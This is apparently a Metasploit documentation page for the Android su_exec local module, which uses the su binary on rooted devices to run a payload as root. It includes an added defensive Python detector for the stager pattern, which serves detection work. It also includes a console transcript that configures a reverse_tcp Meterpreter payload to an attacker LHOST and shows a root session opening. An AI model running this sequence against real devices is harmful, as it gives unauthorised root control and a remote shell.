metasploit-gs/documentation/modules/exploit/android/local/su_exec.md
2025-07-17 11:51:29 +01:00

## Vulnerable Application

This module uses the su binary present on rooted devices to run a payload as root.

A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root.

This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a
temporary directory, make it executable, execute it in the background, and finally delete the executable.

On most devices the su binary will pop up a prompt on the device asking the user for permission.

This module will only work on *rooted* devices. An off-the-shelf Android device is unlikely to be rooted; however, it is possible to root a device without losing the data.
Many devices can be rooted by flashing new firmware, but in that case the existing data will be lost.

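From a defender's perspective, the stager behaviour described above (a root shell spawned through su that writes a file to a temporary directory, marks it executable, runs it and then deletes it) is a recognisable sequence in process telemetry. The following detector is an added example, not part of the Metasploit documentation or the module's code. It assumes a constructed, hypothetical event-log format (`<ts> pid=<n> ppid=<n> uid=<n> comm=<name> <action> <path>`), and the temporary directories it watches (`/data/local/tmp/`, `/data/data/`) are an assumption, since the page does not name the directory the stager uses.

```python
"""Flag the su-based command-stager pattern in a process event log.

Added example, not from the Metasploit project. The log format is constructed
and hypothetical: one event per line with the fields
    <ts> pid=<n> ppid=<n> uid=<n> comm=<name> <action> <path>
where action is one of exec, open_write, chmod, unlink.
"""
import re
from collections import defaultdict
from os.path import basename

EVENT_RE = re.compile(
    r"^(?P<ts>\d+)\s+pid=(?P<pid>\d+)\s+ppid=(?P<ppid>\d+)\s+uid=(?P<uid>\d+)"
    r"\s+comm=(?P<comm>\S+)\s+(?P<action>exec|open_write|chmod|unlink)\s+(?P<path>\S+)$"
)

# Assumed locations a stager would drop into; adjust for the telemetry you actually have.
TEMP_DIRS = ("/data/local/tmp/", "/data/data/")


def parse_event(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    for key in ("ts", "pid", "ppid", "uid"):
        ev[key] = int(ev[key])
    return ev


def detect_su_stager(lines, temp_dirs=TEMP_DIRS):
    """Return one finding per file that a root process descended from an su
    invocation wrote, made executable and then executed (write < chmod < exec).
    Each finding records whether the file was unlinked afterwards."""
    su_root = {}                 # pid -> pid of the su exec this process descends from
    files = defaultdict(dict)    # path -> {"write"/"chmod"/"exec"/"unlink": timestamp}
    file_origin = {}             # path -> su pid that the activity traces back to
    action_key = {"open_write": "write", "chmod": "chmod", "exec": "exec", "unlink": "unlink"}

    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        pid, ppid = ev["pid"], ev["ppid"]
        # A process joins the su tree by exec'ing su itself or by being a child of a tree member.
        if ev["action"] == "exec" and basename(ev["path"]) == "su":
            su_root[pid] = pid
        elif ppid in su_root and pid not in su_root:
            su_root[pid] = su_root[ppid]
        # Only root activity inside the su tree, on files under the watched directories, matters.
        if pid not in su_root or ev["uid"] != 0 or not ev["path"].startswith(temp_dirs):
            continue
        files[ev["path"]][action_key[ev["action"]]] = ev["ts"]
        file_origin.setdefault(ev["path"], su_root[pid])

    findings = []
    for path, seen in files.items():
        if all(k in seen for k in ("write", "chmod", "exec")) and seen["write"] < seen["chmod"] < seen["exec"]:
            findings.append({"path": path, "su_pid": file_origin[path], "deleted": "unlink" in seen})
    return findings


# Constructed sample events (not real device output): one su-launched stager chain,
# one benign su use that only runs `id`, and a root service writing to the temp
# directory outside any su tree, which must not be flagged.
SAMPLE_LOG = """\
1000 pid=2001 ppid=1500 uid=10080 comm=sh exec /system/xbin/su
1001 pid=2002 ppid=2001 uid=0 comm=sh exec /system/bin/sh
1002 pid=2002 ppid=2001 uid=0 comm=sh open_write /data/local/tmp/XyZabc
1003 pid=2002 ppid=2001 uid=0 comm=sh chmod /data/local/tmp/XyZabc
1004 pid=2003 ppid=2002 uid=0 comm=XyZabc exec /data/local/tmp/XyZabc
1005 pid=2002 ppid=2001 uid=0 comm=sh unlink /data/local/tmp/XyZabc
1010 pid=3001 ppid=1500 uid=10080 comm=sh exec /system/xbin/su
1011 pid=3002 ppid=3001 uid=0 comm=id exec /system/bin/id
1020 pid=900 ppid=1 uid=0 comm=installd open_write /data/local/tmp/cache.bin
1021 pid=900 ppid=1 uid=0 comm=installd chmod /data/local/tmp/cache.bin
1022 pid=901 ppid=900 uid=0 comm=cache.bin exec /data/local/tmp/cache.bin
""".splitlines()

if __name__ == "__main__":
    for finding in detect_su_stager(SAMPLE_LOG):
        print(finding)
```

The detector keys on the ancestry relation rather than on file names, because the stager's file name is random and the temporary directory alone is too noisy (the `installd` lines above show a root service doing the same write/chmod/exec without passing through su). Requiring the full write, chmod, exec order keeps a lone root write from triggering, and the `deleted` flag records the clean-up step the page describes, which is useful when deciding whether the binary can still be recovered from the device.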
## Scenarios

You'll first need to obtain a session on the target device. To do this, follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md).

Once the module is loaded, one simply needs to set the `SESSION` option and configure the handler.

An example session follows:

```
msf exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                       Information         Connection
  --  ----  ----                       -----------         ----------
  1         meterpreter dalvik/android  u0_a80 @ localhost  192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)

msf exploit(multi/handler) > use exploit/android/local/su_exec
msf exploit(android/local/su_exec) > set SESSION 1
SESSION => 1
msf exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
payload => linux/aarch64/meterpreter/reverse_tcp
msf exploit(android/local/su_exec) > set LHOST 192.168.0.176
LHOST => 192.168.0.176
msf exploit(android/local/su_exec) > set LPORT 4445
LPORT => 4445
msf exploit(android/local/su_exec) > run
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.0.176:4445
[*] Transmitting intermediate midstager...(256 bytes)
[*] Sending stage (818780 bytes) to 192.168.0.107
[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800
[-] Exploit failed: Rex::TimeoutError Operation timed out.
[*] Exploit completed, but no session was created.
```

Please note that in most cases you will have to manually confirm the Superuser prompt
on the device itself before the module completes. You can do `set WfsDelay 10` to
give yourself more time.